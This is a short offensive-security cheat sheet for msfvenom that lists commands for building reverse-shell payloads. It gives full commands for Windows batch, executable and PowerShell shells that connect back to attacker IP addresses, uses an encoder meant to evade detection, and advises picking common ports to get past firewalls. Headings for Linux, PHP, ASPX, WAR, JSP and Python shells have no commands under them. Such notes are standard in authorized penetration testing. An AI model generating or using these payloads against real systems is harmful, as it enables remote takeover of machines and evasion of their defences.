msfvenom

Source https://docs.metasploit.com/

Always use known port for lhost like , 53, 443, 8080 as most of time firewall will block unknown ports traffic and you will not get connection back

List available formats

msfvenom --list formats

List available payloads for specific platform

msfvenom --payload --list-options | grep windows

Windows

bat reverse shell

mostly used with JuicyPotato exploit

msfvenom -p cmd/windows/reverse_powershell lhost=10.10.12.15 lport=4444 > shell.bat

exe reverse shell

msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4443 -e x86/shikata_ga_nai -f exe -o non_staged.exe

Powershell

msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4443 -e x86/shikata_ga_nai -i 9 -f psh -o shell.ps1

x64 Bit payload

Embedded payload

Linux

bind shell

reverse shell

Other Platforms

php reverse shell

aspx reverse shell

Java WAR reverse shell

Most time will used to get shell on tomcat

jsp reverse shell

python reverse shell

Last updated

Was this helpful?